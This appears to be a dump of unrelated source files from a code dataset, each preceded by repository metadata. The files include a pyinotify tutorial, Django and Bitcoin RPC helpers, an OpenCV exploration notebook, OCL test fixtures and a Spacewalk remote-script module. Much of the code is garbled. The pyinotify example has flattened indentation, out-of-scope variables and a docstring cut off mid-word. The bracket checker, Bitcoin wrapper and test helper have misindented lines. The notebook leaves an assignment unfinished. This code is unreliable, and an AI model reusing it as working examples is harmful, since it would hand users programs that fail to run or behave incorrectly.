| 15,047 | 0.009238 |
#!/usr/bin/env python
# #To familiarize yourself with pyinotify, run a first example like this:
#
# # $ cd pyinotify-x-x-x && python setup.py build
# # $ python src/pyinotify/pyinotify.py -v my-dir-to-watch
#
# # Let's start a more detailed example. Say, we want to monitor the temp directory '/tmp' and all its subdirectories for every new file's creation or deletion. For sake of simplicity, we only print messages for every notification on standart output.
# #
# # Now you have the choice to either receive and process the notifications in the thread who instantiate the monitoring, the main benefit is that it doesn't need to instantiate a new thread, the drawback is to block your program in this task. Or, you don't want to block your main thread, so you can handle the notifications in a new separate thread. Choose which one is the most adapted to your needs and is consistent with your constraints and design choices. Next, we will detail the two approaches:
# # Notifier ThreadedNotifier
# #
# # #First the import statements: the watch manager stores the watches and provide operations on watches. EventsCodes bring a set of codes, each code is associated to an event. ProcessEvent is the processing class.
import os
from pyinotify import WatchManager, Notifier, ThreadedNotifier, EventsCodes, ProcessEvent
wm = WatchManager()
# The following class inherits from ProcessEvent; it handles notifications and processes the defined actions with individual processing methods whose names follow the syntax process_EVENT_NAME, where EVENT_NAME is the name of the handled event to process.
mask = EventsCodes.IN_DELETE | EventsCodes.IN_CREATE # watched events
class PTmp(ProcessEvent):
def process_IN_CREATE(self, event):
print "Create: %s" % os.path.join(event.path, event.name)
def process_IN_DELETE(self, event):
print "Remove: %s" % os.path.join(event.path, event.name)
# This statement instantiates our notifier class and performs the initialization, in particular the inotify instantiation. The second parameter is a callable object, the one which will be used to process notified events this way: PTmp()(event), where event is the notified event.
# The next statement adds a watch on the first parameter and recursively on all its subdirectories; note that symlinks are not followed. The recursion is due to the optional parameter named 'rec' set to True. By default, the monitoring is limited to the level of the given directory. It returns a dict where keys are paths and values are corresponding watch descriptors (wd), and it is assigned to wdd. A unique wd is attributed to every new watch. It is useful (and often necessary) to keep those wds for further updating or removing one of those watches, see the dedicated section. Obviously, if the monitored element had been a file, the rec parameter would have been ignored whatever its value.
# Let's start reading the events and processing them. Note that during the loop we can freely add, update or remove any watches; we can also do anything we want, even stuff unrelated to pyinotify. We call the stop() method when we want to stop monitoring.
def watch_blocking(watchdir):
    # Blocking variant: handle notifications in the thread that set up the watch.
    notifier = Notifier(wm, PTmp())
    watchdir = os.path.abspath(watchdir)
    wdd = wm.add_watch(watchdir, mask, rec=True)
    while True: # loop forever
        try: # process the queue of events as explained above
            notifier.process_events()
            if notifier.check_events():
                notifier.read_events()
                # read notified events and enqueue them
            # you can do some tasks here...
        except KeyboardInterrupt: # destroy the inotify's instance on this interrupt (stop monitoring)
            notifier.stop()
            break
def watch_threaded(watchdir):
    # Threaded variant: the next line starts the new thread, doing actually nothing as no directory or file is being monitored yet.
    notifier = ThreadedNotifier(wm, PTmp())
    notifier.start()
    watchdir = os.path.abspath(watchdir)
    wdd = wm.add_watch(watchdir, mask, rec=True)
    return notifier, wdd
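# Minimal usage sketch for the threaded variant above (the path is illustrative):
#
#   notifier, wdd = watch_threaded('/tmp')
#   ...                 # the main thread is free to do unrelated work here
#   notifier.stop()     # stops monitoring and destroys the inotify instance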
####
####At any moment we can for example remove the watch on '/tmp' like This:
if wdd[watchdir] > 0: # test if the wd is valid, this test is not mandatory
wm.rm_watch(wdd[watchdir])
### #### Note that its subdirectories (if any) are still being watched. If we wanted to remove '/tmp' and all the watches on its sudirectories, we could have done like that:
####
wm.rm_watch(wdd[watchdir], rec=True)
wm.rm_watch(wdd.values())
notifier.stop()
# That is, most of the code is written, next, we can add, update or remove watches on files or directories with the same principles.
## The only remaining important task is to stop the thread when we wish stop monitoring, it will automatically destroy the inotify's instance. Call the following method:
# The EventsCodes Class top
# Edited Sun, 26 Nov 2006 10:53
# Event Name Is an Event Description
# IN_ACCESS Yes file was accessed.
# IN_ATTRIB Yes metadata changed.
# IN_CLOSE_NOWRITE Yes unwrittable file was closed.
# IN_CLOSE_WRITE Yes writtable file was closed.
# IN_CREATE Yes file/dir was created in watched directory.
# IN_DELETE Yes file/dir was deleted in watched directory.
# IN_DELETE_SELF Yes watched item itself was deleted.
# IN_DONT_FOLLOW No don't follow a symlink (lk 2.6.15).
# IN_IGNORED Yes raised on watched item removing. Probably useless for you, prefer instead IN_DELETE*.
# IN_ISDIR No event occurred against directory. It is always piggybacked to an event. The Event structure automatically provide this information (via .is_dir)
# IN_MASK_ADD No to update a mask without overwriting the previous value (lk 2.6.14). Useful when updating a watch.
# IN_MODIFY Yes file was modified.
# IN_MOVE_SELF Yes watched item itself was moved, currently its full pathname destination can only be traced if its source directory and destination directory are both watched. Otherwise, the file is still being watched but you cannot rely anymore on the given path (.path)
# IN_MOVED_FROM Yes file/dir in a watched dir was moved from X. Can trace the full move of an item when IN_MOVED_TO is available too, in this case if the moved item is itself watched, its path will be updated (see IN_MOVE_SELF).
# IN_MOVED_TO Yes file/dir was moved to Y in a watched dir (see IN_MOVE_FROM).
# IN_ONLYDIR No only watch the path if it is a directory (lk 2.6.15). Usable when calling .add_watch.
# IN_OPEN Yes file was opened.
# IN_Q_OVERFLOW Yes event queued overflowed. This event doesn't belongs to any particular watch.
# IN_UNMOUNT Yes backing fs was unmounted. Notified to all watches located on this fs.
#
#
# wd (int): is the Watch Descriptor, it is an unique identifier who represents the watched item through which this event could be observed.
# path (str): is the complete path of the watched item as given in parameter to the method .add_watch.
# name (str): is not None only if the watched item is a directory, and if the current event has occurred against an element included in that directory.
# mask (int): is a bitmask of events, it carries all the types of events watched on wd.
# event_name (str): readable event name.
# is_dir (bool): is a boolean flag set to True if the event has occurred against a directory.
# cookie (int): is a unique identifier permitting to tie together two related 'moved to' and 'moved from' events.
#
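# Illustrative sketch (not part of the original script): pairing a 'moved from'
# event with its 'moved to' counterpart via the 'cookie' attribute described
# above. The watch mask would also need IN_MOVED_FROM | IN_MOVED_TO for these
# handlers to fire.
pending_moves = {}
class MoveTracker(ProcessEvent):
    def process_IN_MOVED_FROM(self, event):
        pending_moves[event.cookie] = os.path.join(event.path, event.name)
    def process_IN_MOVED_TO(self, event):
        src = pending_moves.pop(event.cookie, None)
        print "Moved: %s -> %s" % (src, os.path.join(event.path, event.name))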
class MyProcessing(ProcessEvent):
def __init__(self):
"""
Does nothing in this case, but you can as well implement this constructor
and you don't need to explicitely call its base class constructor.
"""
pass
    def process_IN_DELETE(self, event):
"""
This method process a specific kind of event (IN_DELETE). event
is an instance of Event.
"""
print '%s: deleted' % os.path.join(event.path, event.name)
    def process_IN_CLOSE(self, event):
"""
This method is called for these events: IN_CLOSE_WRITE,
IN_CLOSE_NOWRITE.
"""
print '%s: closed' % os.path.join(event.path, event.name)
    def process_default(self, event):
"""
Ult
|
linea-it/dri
|
api/userquery/email.py
|
Python
|
gpl-3.0
| 519 | 0.007707 |
"""
send mail with html template
"""
import logging
from django.template.loader import render_to_string
from common.notify import Notify
class Email:
def __init__(self):
self.logger = logging.getLogger('userquery')
    def send(self, data):
self.logger.info("Sending mail by template %s" % data["template"])
subject = "UserQuery - %s" % data["subject"]
body = render_to_string(data["template"], data)
Notify().send_email(subject, body, data["email"])
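# Hedged usage sketch (the dict keys mirror what send() reads above; the template
# path and address are placeholders, not real project values):
#
#   Email().send({
#       "template": "userquery/notify.html",
#       "subject": "query finished",
#       "email": "user@example.com",
#       # any extra keys are available to the template via the rendering context
#   })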
|
obi-two/Rebelion
|
data/scripts/templates/object/tangible/lair/base/shared_poi_all_lair_thicket_large_evil_fire_red.py
|
Python
|
mit
| 468 | 0.047009 |
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
	result = Tangible()
result.template = "object/tangible/lair/base/shared_poi_all_lair_thicket_large_evil_fire_red.iff"
result.attribute_template_id = -1
result.stfName("lair_n","thicket")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
supermikol/coursera
|
Data Structures/Week 1/check_brackets_in_code/check_brackets.py
|
Python
|
mit
| 1,323 | 0.005291 |
# python3
import sys
class Bracket:
def __init__(self, bracket_type, position):
self.bracket_type = bracket_type
self.position = position
def Match(self, c):
if self.bracket_type == '[' and c == ']':
return True
if self.bracket_type == '{' and c == '}':
return True
if self.bracket_type == '(' and c == ')':
return True
return False
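# Quick illustration of Bracket.Match (positions are arbitrary):
#
#   Bracket('(', 0).Match(')')   # -> True
#   Bracket('[', 3).Match('}')   # -> False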
if __name__ == "__main__":
text = sys.stdin.read()
opening_brackets_stack = []
index = []
for i, next in enumerate(text):
match = True
if next == '(' or next == '[' or next == '{':
# Process opening bracket, write your code here
opening_brackets_stack.append(Bracket(next,i))
index.append(i+1)
if next == ')' or next == ']' or next == '}':
|
if len(opening_brackets_stack) == 0 or opening_brackets_stack.pop().Match(next) == False:
match = False
index.append(i+1)
break
index.pop()
# Process closing bracket, write your code here
# Printing answer, write your code here
if match == False or len(opening_brackets_stack) > 0:
print(index.pop())
else:
print("Success")
|
graveljp/smugcli
|
smugcli/terminal_size.py
|
Python
|
mit
| 2,716 | 0.002577 |
#!/usr/bin/env python
# Source: https://gist.github.com/jtriley/1108174
import os
import shlex
import struct
import platform
import subprocess
def get_terminal_size():
""" getTerminalSize()
- get width and height of console
- works on linux,os x,windows,cygwin(windows)
originally retrieved from:
http://stackoverflow.com/questions/566746/how-to-get-console-window-width-in-python
"""
current_os = platform.system()
tuple_xy = None
if current_os == 'Windows':
tuple_xy = _get_terminal_size_windows()
if tuple_xy is None:
tuple_xy = _get_terminal_size_tput()
# needed for window's python in cygwin's xterm!
if current_os in ['Linux', 'Darwin'] or current_os.startswith('CYGWIN'):
tuple_xy = _get_terminal_size_linux()
if tuple_xy is None:
tuple_xy = (80, 25) # default value
return tuple_xy
def _get_terminal_size_windows():
try:
from ctypes import windll, create_string_buffer
# stdin handle is -10
# stdout handle is -11
# stderr handle is -12
h = windll.kernel32.GetStdHandle(-12)
csbi = create_string_buffer(22)
res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
if res:
(bufx, bufy, curx, cury, wattr,
left, top, right, bottom,
maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
sizex = right - left + 1
sizey = bottom - top + 1
return sizex, sizey
except:
pass
def _get_terminal_size_tput():
# get terminal width
# src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window
try:
        # check_call returns the exit status (0 on success), not the command
        # output, so use check_output to capture the actual numbers.
        cols = int(subprocess.check_output(shlex.split('tput cols')))
        rows = int(subprocess.check_output(shlex.split('tput lines')))
        return (cols, rows)
except:
pass
def _get_terminal_size_linux():
def ioctl_GWINSZ(fd):
try:
import fcntl
import termios
cr = struct.unpack('hh',
fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
return cr
except:
pass
    cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
if not cr:
try:
fd = os.open(os.ctermid(), os.O_RDONLY)
cr = ioctl_GWINSZ(fd)
os.close(fd)
except:
pass
if not cr:
try:
cr = (os.environ['LINES'], os.environ['COLUMNS'])
except:
return None
return int(cr[1]), int(cr[0])
if __name__ == "__main__":
sizex, sizey = get_terminal_size()
print('width =', sizex, 'height =', sizey)
|
dirkjot/pingpongcam
|
opencv/exploration-3.py
|
Python
|
gpl-3.0
| 8,044 | 0.010816 |
# coding: utf-8
# Given code that can extract the contents of the inner rectangles (boxes), we can determine whether the
# contents have changed.
#
# Here, take an image of the previous box and see whether the same contents are still there. The idea is that
# a name does not only get erased, it may also be replaced. We hope to find something more robust than the ink
# method (exploration-2).
#
# In[1]:
LIVENOTEBOOK = True
import cv2
cv2.__version__
import extract_blue_grid
get_contents = extract_blue_grid.get_contents
# In[2]:
def get_content1(imagepath):
"return 2nd box and contour from get_contents"
boxes, contours = get_contents(imagepath)
return boxes[1], contours[1]
# In[3]:
import numpy as np
import matplotlib.pyplot as plt
from skimage.measure import compare_ssim
def imshow(img): plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
imwriting1 = cv2.imread("../reference/frame276.png")
imwriting2 = cv2.imread("../reference/frame280.png")
imempty = cv2.imread("../reference/frame272.png")
if LIVENOTEBOOK:
get_ipython().magic(u'matplotlib inline')
# test plotting
imshow(np.concatenate([imwriting1,imwriting2,imempty], axis=1))
# In[ ]:
# not used:
def threshold_boxes(boxes):
"""Given a list of images, adaptive threshold each image"""
output = []
for img in boxes:
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
dst = cv2.adaptiveThreshold(img, 160, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 5, 2)
output.append(dst)
return output
# In[4]:
get_ipython().magic(u'matplotlib inline')
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (9, 9))
writing1,contours1 = get_content1("../reference/frame276.png")
writing1 = cv2.morphologyEx(writing1, cv2.MORPH_OPEN, kernel)
writing1 = cv2.cvtColor(writing1, cv2.COLOR_BGR2GRAY)
#writing1 = cv2.adaptiveThreshold(writing1, 160, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 5, 2)
writing2,contours2 = get_content1("../reference/frame280.png")
writing2 = cv2.morphologyEx(writing2, cv2.MORPH_OPEN, kernel)
writing2 = cv2.cvtColor(writing2, cv2.COLOR_BGR2GRAY)
#writing2 = cv2.adaptiveThreshold(writing2, 160, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 5, 2)
empty,contoursempty = get_content1("../reference/frame272.png")
empty = cv2.morphologyEx(empty, cv2.MORPH_OPEN, kernel)
empty = cv2.cvtColor(empty, cv2.COLOR_BGR2GRAY)
#empty = cv2.adaptiveThreshold(empty, 160, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 5, 2)
plt.imshow(np.concatenate([writing1,writing2,empty]))
#plt.imshow(writing1)
#writing1.shape, writing2.shape, empty.shape
# In[5]:
writingb, contoursb = get_content1("../reference/frame274.png")
writingb = cv2.morphologyEx(writingb, cv2.MORPH_OPEN, kernel)
writingb = cv2.cvtColor(writingb, cv2.COLOR_BGR2GRAY)
writingc, contoursc = get_content1("../reference/frame275.png")
writingc = cv2.morphologyEx(writingc, cv2.MORPH_OPEN, kernel)
writingc = cv2.cvtColor(writingc, cv2.COLOR_BGR2GRAY)
plt.imshow(np.concatenate([writing1,writingb,writingc]))
# In[6]:
# matching does not work on a whole image: it looks like it does:
img = writing1.copy()
method = cv2.TM_SQDIFF
w, h = writing1.shape[::-1]
res = cv2.matchTemplate(writingb,writing1,method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
top_left = min_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
cv2.rectangle(img,top_left, bottom_right, 255, 2)
print(top_left, bottom_right, "%2.2e" % min_val )
plt.imshow(img)
# In[ ]:
# but it another word too
img = writing2.copy()
method = cv2.TM_SQDIFF
w, h = img.shape[::-1]
res = cv2.matchTemplate(img,writing1,method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
top_left = min_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
cv2.rectangle(img,top_left, bottom_right, 255, 2)
print(top_left, bottom_right, "%2.2e" % min_val)
plt.imshow(img)
# In[ ]:
# and it matches empty just as well..
img = empty.copy()
method = cv2.TM_SQDIFF
w, h = img.shape[::-1]
res = cv2.matchTemplate(img,writing1,method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
top_left = min_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
cv2.rectangle(img,top_left, bottom_right, 255, 2)
print(top_left, bottom_right, "%2.2e" % min_val)
plt.imshow(img)
# so the first result (2 up ) sounds like the whole img got recognized, great. but retrying it with another word and empty shows we recognize almost everything. There are variations in value but they are pretty close, given all the noise around the image.
#
# i think we should:
# - straighten out the image
# - take a template just around the word bravo
# - then match against a straightened target image
# - the straightening may not be nec (may you write crooked) but template matching is on rects.
#
#
# ### Let's try this out with a hand made template without straightening
#
# In[7]:
template = cv2.imread('template.png') # used gimp to cut it
template = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)
plt.imshow(template)
# In[ ]:
def frame_img(img, dim):
"put image in a black frame so resulting image has shape dim"
framed = np.zeros(dim, dtype=img.dtype)
jx, jy = np.trunc((np.array(dim) - np.array(img.shape))/2).astype(int)
assert jx>0 and jy>0, "Image must be smaller than desired dimensions"
framed[jx:jx+img.shape[0], jy:jy+img.shape[1]] = img
return framed
def locate_template(img, template):
"Find template in image and produce stats + image "
img1 = img.copy()
# method = cv2.TM_SQDIFF, tried this first, works less well and gives numbers that are harder to
# interpret. For sqdiff, lower is better and non-id copies were around 1e6, alpha around 4e6
method = cv2.TM_CCOEFF_NORMED
w, h = template.shape[::-1]
res = cv2.matchTemplate(template,img1,method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
top_left = max_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
cv2.rectangle(img1,top_left, bottom_right, 128, 2)
print("best val, res.min, res.max:", min_val/1e6, res.min(), res.max())
#framed = frame_img(res, img1.shape)
# this does not work because the scale (min-max) of framed is very different from res.
#plt.imshow(np.concatenate([img1.astype(np.float32)*np.mean(framed), framed.astype(np.float32)]), cmap="gray")
plt.imshow(img1.astype(np.float32), cmap="gray")
return max_val, img1
value, _ = locate_template(writing1, template)
value
# In[ ]:
# for SQDIFF this one scored quite high, with COEFF_NORMED it is fine.
value, _ = locate_template(writingb, template)
"value %2.2e" % value
# In[ ]:
value, _ = locate_template(writingc, template)
"value %2.2e" % value
# In[ ]:
value, _ = locate_template(writing2, template)
"value %2.2e" % value
# In[ ]:
value, _ = locate_template(empty, template)
"value %2.2e" % value
# ## So we have to find that template and we are in business
# In[8]:
contours1.shape # shape of box shown in writing1
# In[9]:
def scale_contour(contour, scale):
"Shrinks or grows a contour by the given factor"
moments = cv2.moments(contour)
midX = int(round(moments["m10"] / moments["m00"]))
midY = int(round(moments["m01"] / moments["m00"]))
mid = np.array([midX,midY])
contour = contour - mid
contour = (contour * scale).astype(np.int32)
contour += mid
return contour
# In[14]:
c = contours1
dst = np.dstack([writing1.copy(), np.zeros_like(writing1), np.zeros_like(writing1)])
dst = cv2.drawContours(dst, [c], -1, (0,255,0), 3)
peri = 0.01 * cv2.arcLength(c, True)  # epsilon for approxPolyDP: 1% of the contour's perimeter
approx = cv2.approxPolyDP(c, peri, True)
approx = scale_contour(approx, 0.8)
dst = cv2.drawContours(dst, [approx], -1, (0,175,0), 3)
imshow(dst)
#plt.imshow(dst, cmap="gray")
template1 =
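# A guess at how template1 could be produced here (not the author's code): cut the bounding rect of the shrunken contour out of writing1.
# In[ ]:
x, y, w, h = cv2.boundingRect(approx)
template1 = writing1[y:y + h, x:x + w]
imshow(template1)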
# In[ ]:
# In[ ]:
img = np.zeros((141, 390,3), dtype=np.uint8)
img[:]=(240,240,240)
cv2.drawContours(img, [contours1], -1, (8,255,5), 3)
imshow(img)
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
|
BTCX/BTCX_blockchain
|
btcxblockchainapi/btcrpc/utils/btc_rpc_call.py
|
Python
|
mit
| 3,371 | 0.009789 |
from bitcoinrpc.authproxy import AuthServiceProxy, JSONRPCException
from btcrpc.utils.config_file_reader import ConfigFileReader
import json
import socket, errno
from btcrpc.utils.log import *
log = get_log("BTCRPCCall:")
class BTCRPCCall(object):
def __init__(self, wallet="receive", currency="btc"):
yml_config_reader = ConfigFileReader()
url = yml_config_reader.get_rpc_server(currency=currency, wallet=wallet)
self.access = AuthServiceProxy(url)
def do_getinfo(self):
return self.access.getinfo()
def do_get_new_address(self):
return self.access.getnewaddress();
def do_set_account(self, address, account):
return self.access.setaccount(address, account)
def do_get_transaction(self, txid):
try:
return self.access.gettransaction(txid)
except RuntimeError:
|
# return simplejson.dumps ({u'error' : u'txid is not valid'})
return None
|
def do_list_transactions(self, account, count=10, from_index=0):
try:
return self.access.listtransactions(account, count, from_index)
except RuntimeError:
print("calling failure")
def do_get_transaction(self, tx_id):
try:
return self.access.gettransaction(tx_id)
except RuntimeError:
#return simplejson.dumps ({u'error' : u'txid is not valid'})
return None
def amount_received_by_address(self, address="", confirms=0):
return self.access.getreceivedbyaddress(address, confirms)
def do_validate_address(self, address=""):
return self.access.validateaddress(address)
def list_transactions(self, account="", count=10, from_index=0):
return self.access.listtransactions(account, count, from_index)
def send_from(self, from_account="", to_address="", amount=0, minconf=1):
return self.access.sendfrom(from_account, to_address, amount, minconf)
def get_received_amount_by_account(self, account="", minconf=1):
return self.access.getreceivedbyaccount(account, minconf)
def get_balance(self, account="", minconf=1):
return self.access.getbalance(account, minconf)
def get_wallet_balance(self):
return self.access.getbalance()
def move(self, from_account="", to_account="", amount=0, minconf=1):
return self.access.move(from_account, to_account, amount, minconf)
def list_accounts(self, confirmations=1):
return self.access.listaccounts(confirmations)
def list_received_by_address(self, confirmations=1, include_empty=False):
return self.access.listreceivedbyaddress(confirmations, include_empty)
def get_addresses_by_account(self, account):
return self.access.getaddressesbyaccount(account)
def set_tx_fee(self, amount):
return self.access.settxfee(amount)
def send_to_address(self, address, amount, subtractfeefromamount=True):
return self.access.sendtoaddress(address, amount, "", "", subtractfeefromamount)
# amount is type of dictionary
def send_many(self, from_account="", minconf=1, **amounts):
log.info("From account: %s", from_account)
log.info("To accounts: %s", json.dumps(amounts))
amounts_string = json.dumps(amounts['amounts'])
amounts_object = json.loads(amounts_string)
try:
return True, self.access.sendmany(from_account, amounts_object, minconf)
except JSONRPCException as ex:
return False, ex
except socket.error as e:
return False, e
|
snyaggarwal/oclapi
|
ocl/test_helper/base.py
|
Python
|
mpl-2.0
| 10,616 | 0.004333 |
import random
import string
from collection.models import CollectionVersion, Collection
from concepts.models import Concept, ConceptVersion, LocalizedText
from oclapi.models import ACCESS_TYPE_EDIT, ACCESS_TYPE_VIEW
from orgs.models import Organization
from sources.models import Source, SourceVersion
from users.models import UserProfile
from mappings.models import Mapping, MappingVersion
from django.contrib.auth.models import User
from django.test import TestCase
class OclApiBaseTestCase(TestCase):
def setUp(self):
self._clear_fixtures()
self.user = create_user()
org_ocl = create_organization("OCL")
create_lookup_concept_classes(self.user, org_ocl)
def _clear_fixtures(self):
LocalizedText.objects.filter().delete()
ConceptVersion.objects.filter().delete()
Concept.objects.filter().delete()
MappingVersion.objects.filter().delete()
Mapping.objects.filter().delete()
SourceVersion.objects.filter().delete()
Source.objects.filter().delete()
CollectionVersion.objects.filter().delete()
Collection.objects.filter().delete()
Organization.objects.filter().delete()
UserProfile.objects.filter().delete()
User.objects.filter().delete()
def tearDown(self):
self._clear_fixtures()
def generate_random_string(length=5):
return ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(length))
def create_localized_text(name, locale='en', type='FULLY_SPECIFIED', locale_preferred=False):
return LocalizedText(name=name, locale=locale, type=type, locale_preferred=locale_preferred)
def create_user():
suffix = generate_random_string()
user = User.objects.create_user(
username="test{0}".format(suffix),
password="test{0}".format(suffix),
email='user{0}@test.com'.format(suffix),
first_name='Test',
last_name='User'
)
create_user_profile(user)
# set password again as create_user hashed it
user.password = "test{0}".format(suffix)
return user
def create_user_profile(user):
suffix = generate_random_string()
mnemonic = user.username if user else 'user{0}'.format(suffix)
return UserProfile.objects.create(user=user, mnemonic=mnemonic)
def create_organization(name=None, mnemonic=None):
suffix = generate_random_string()
name = name if name else 'org{0}'.format(suffix)
mnemonic = mnemonic if mnemonic else name
return Organization.objects.create(name=name, mnemonic=mnemonic)
def create_source(user, validation_schema=None, organization=None, name=None):
suffix = generate_random_string()
source = Source(
name=name if name else "source{0}".format(suffix),
mnemonic=name if name else "source{0}".format(suffix),
full_name=name if name else "Source {0}".format(suffix),
source_type='Dictionary',
public_access=ACCESS_TYPE_EDIT,
default_locale='en',
supported_locales=['en'],
website='www.source.com',
description='This is a test source',
custom_validation_schema=validation_schema
)
if organization is not None:
kwargs = {
'parent_resource': organization
}
else:
kwargs = {
'parent_resource': UserProfile.objects.get(user=user)
}
Source.persist_new(source, user, **kwargs)
return Source.objects.get(id=source.id)
def create_collection(user, validation_schema=None, name=None):
suffix = generate_random_string()
collection = Collection(
name=name if name else "collection{0}".format(suffix),
mnemonic=name if name else "collection{0}".format(suffix),
full_name=name if name else "Collection {0}".format(suffix),
|
        collection_type='Dictionary',
        public_access=ACCESS_TYPE_EDIT,
        default_locale='en',
        supported_locales=['en'],
        website='www.collection2.com',
|
description='This is the second test collection',
custom_validation_schema=validation_schema
)
kwargs = {
'parent_resource': UserProfile.objects.get(user=user)
}
Collection.persist_new(collection, user, **kwargs)
return Collection.objects.get(id=collection.id)
def create_concept(user, source, source_version=None, names=None, mnemonic=None, descriptions=None, concept_class=None, datatype=None,
force=False, extras=None):
suffix = generate_random_string()
if not names and not force:
names = [create_localized_text("name{0}".format(suffix))]
if not mnemonic and not force:
mnemonic = 'concept{0}'.format(suffix)
if not descriptions and not force:
descriptions = [create_localized_text("desc{0}".format(suffix))]
concept = Concept(
mnemonic=mnemonic,
updated_by=user,
datatype=datatype if datatype else "None",
concept_class=concept_class if concept_class else 'Diagnosis',
names=names,
descriptions=descriptions,
extras=extras
)
if source is not None:
kwargs = {
'parent_resource': source,
}
if source_version is not None:
kwargs['parent_resource_version'] = source_version
errors = Concept.persist_new(concept, user, **kwargs)
else:
errors = Concept.persist_new(concept, user)
return concept, errors
def create_mapping(user, source, from_concept, to_concept, map_type="SAME-AS", mnemonic=None):
mapping=None
if mnemonic:
mapping = Mapping(mnemonic=mnemonic, created_by=user, updated_by=user, parent=source, map_type=map_type,
from_concept=from_concept, to_concept=to_concept, public_access=ACCESS_TYPE_VIEW,)
else:
mapping = Mapping(created_by=user, updated_by=user, parent=source, map_type=map_type,
from_concept=from_concept, to_concept=to_concept, public_access=ACCESS_TYPE_VIEW, )
kwargs = {
'parent_resource': source,
}
Mapping.persist_new(mapping, user, **kwargs)
return Mapping.objects.get(id=mapping.id)
def create_lookup_concept_classes(user, org_ocl):
classes_source = create_source(user, organization=org_ocl, name="Classes")
datatypes_source = create_source(user, organization=org_ocl, name="Datatypes")
nametypes_source = create_source(user, organization=org_ocl, name="NameTypes")
descriptiontypes_source = create_source(user, organization=org_ocl, name="DescriptionTypes")
maptypes_source = create_source(user, organization=org_ocl, name="MapTypes")
locales_source = create_source(user, organization=org_ocl, name="Locales")
create_concept(user, classes_source, concept_class="Concept Class", names=[create_localized_text("Diagnosis")])
create_concept(user, classes_source, concept_class="Concept Class", names=[create_localized_text("Drug")])
create_concept(user, classes_source, concept_class="Concept Class", names=[create_localized_text("Test")])
create_concept(user, classes_source, concept_class="Concept Class", names=[create_localized_text("Procedure")])
create_concept(user, datatypes_source, concept_class="Datatype", names=[create_localized_text("None"), create_localized_text("N/A")])
create_concept(user, datatypes_source, concept_class="Datatype", names=[create_localized_text("Numeric")])
create_concept(user, datatypes_source, concept_class="Datatype", names=[create_localized_text("Coded")])
create_concept(user, datatypes_source, concept_class="Datatype", names=[create_localized_text("Text")])
create_concept(user, nametypes_source, concept_class="NameType",
names=[create_localized_text("FULLY_SPECIFIED"), create_localized_text("Fully Specified")])
create_concept(user, nametypes_source, concept_class="NameType",
names=[create_localized_text("Short"), create_localized_text("SHORT")])
create_concept(user, nametypes_source, concept_class="NameType",
names=[create_localized_text("INDEX_TERM"), create_localized_text("Index Term")])
create_concept(use
|
jhutar/spacewalk
|
client/tools/rhncfg/actions/script.py
|
Python
|
gpl-2.0
| 9,141 | 0.002297 |
#
# Copyright (c) 2008--2016 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import os
import sys
import pwd
import grp
import time
import select
import signal
import tempfile
import base64
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# this is ugly, hopefully it will be natively supported in up2date
from actions.configfiles import _local_permission_check, _perm_error
from config_common import local_config
from config_common.rhn_log import set_logfile, log_to_file
sys.path.append('/usr/share/rhn')
from up2date_client import config
# this is a list of the methods that get exported by a module
__rhnexport__ = [
'run',
]
# action version we understand
ACTION_VERSION = 2
# SystemExit exception error code
SYSEXIT_CODE = 3
class SignalHandler:
def __init__(self):
self.gotSigterm = False
# Handle SIGTERM so that we can return status to Satellite
def handle(self, signal, frame):
self.gotSigterm = True
raise SystemExit(SYSEXIT_CODE)
def _create_script_file(script, uid=None, gid=None):
storageDir = tempfile.gettempdir()
script_path = os.path.join(storageDir, 'rhn-remote-script')
# Loop a couple of times to try to get rid of race conditions
for i in range(2):
try:
fd = os.open(script_path, os.O_RDWR | os.O_CREAT | os.O_EXCL, int("0700", 8))
# If this succeeds, break out the loop
break
except OSError:
e = sys.exc_info()[1]
if e.errno != 17: # File exists
raise
# File does exist, try to remove it
try:
os.unlink(script_path)
except OSError:
e = sys.exc_info()[1]
if e.errno != 2: # No such file or directory
raise
else:
# Tried a couple of times, failed; bail out raising the latest error
raise
sf = os.fdopen(fd, 'wb')
sf.write(script.encode("utf-8"))
sf.close()
if uid and gid:
os.chown(script_path, uid, gid)
return script_path
# Make sure the dir-path to a file exists
def _create_path(fpath):
d = os.path.dirname(fpath)
if d and not os.path.exists(d):
os.makedirs(d, int("0700", 8))
return os.path.exists(d)
def run(action_id, params, cache_only=None):
# Setup SIGTERM handler
sHandler = SignalHandler()
